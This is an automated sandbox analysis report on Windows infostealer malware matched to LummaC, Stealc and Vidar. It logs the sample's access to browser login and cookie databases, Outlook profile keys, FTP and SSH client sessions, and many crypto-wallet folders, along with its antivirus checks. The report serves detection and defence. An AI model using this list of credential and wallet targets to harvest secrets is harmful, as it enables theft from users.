Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 29_2_6CAC1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,

29_2_6CAC1C30

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6CB7B341 cpuid

3_2_6CB7B341

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		3_2_00417630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		29_2_0040E910

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Queries volume information: C:\Users\userFBKFCFBFID.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Queries volume information: C:\Users\userIEHDAFHDHC.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Queries volume information: C:\ProgramData\DHCGHDHIDH.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\HDAFIIDAKJ.exe	Queries volume information: C:\ProgramData\HDAFIIDAKJ.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,

3_2_00417420

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_004172F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

3_2_004174D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 29_2_6CAC1BC0 memset,GetVersionExA,

29_2_6CAC1BC0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: file.exe, 00000000.00000002.1244342672.0000000001641000.00000004.00000020.00020000.00000000.sdmp, userFBKFCFBFID.exe, 00000012.00000002.1377947298.0000000001212000.00000004.00000020.00020000.00000000.sdmp, userIEHDAFHDHC.exe, 0000001B.00000002.1381565125.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, DHCGHDHIDH.exe, 00000027.00000002.1880887978.0000000001452000.00000004.00000020.00020000.00000000.sdmp, HDAFIIDAKJ.exe, 0000002A.00000002.1890730965.0000000000853000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: Amcache.hve.33.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.33.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.33.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: file.exe, 00000000.00000002.1244342672.0000000001641000.00000004.00000020.00020000.00000000.sdmp, userFBKFCFBFID.exe, 00000012.00000002.1377947298.0000000001212000.00000004.00000020.00020000.00000000.sdmp, userIEHDAFHDHC.exe, 0000001B.00000002.1381565125.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, DHCGHDHIDH.exe, 00000027.00000002.1880887978.0000000001452000.00000004.00000020.00020000.00000000.sdmp, HDAFIIDAKJ.exe, 0000002A.00000002.1890730965.0000000000853000.00000004.00000020.00020000.00000000.sdmp, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	Binary or memory string: AVP.exe
Source: Amcache.hve.33.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000EDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.33.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7492, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 29.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.userIEHDAFHDHC.exe.38b5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.userIEHDAFHDHC.exe.38b5570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: userIEHDAFHDHC.exe PID: 7444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3916, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: RegAsm.exe	String found in binary or memory: \jaxx\Local Storage\
Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: RegAsm.exe	String found in binary or memory: passphrase.json
Source: RegAsm.exe	String found in binary or memory: \jaxx\Local Storage\
Source: RegAsm.exe	String found in binary or memory: \Ethereum\
Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 147.45.44.104rontdesk\AppData\Roaming\Binance\.finger-print.fp
Source: RegAsm.exe	String found in binary or memory: Ethereum
Source: RegAsm.exe	String found in binary or memory: file__0.localstorage
Source: RegAsm.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: RegAsm.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: RegAsm.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3916, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7492, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 29.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.userIEHDAFHDHC.exe.38b5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.userIEHDAFHDHC.exe.38b5570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: userIEHDAFHDHC.exe PID: 7444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3916, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CD30C40 sqlite3_bind_zeroblob,	3_2_6CD30C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CD30D60 sqlite3_bind_parameter_name,	3_2_6CD30D60
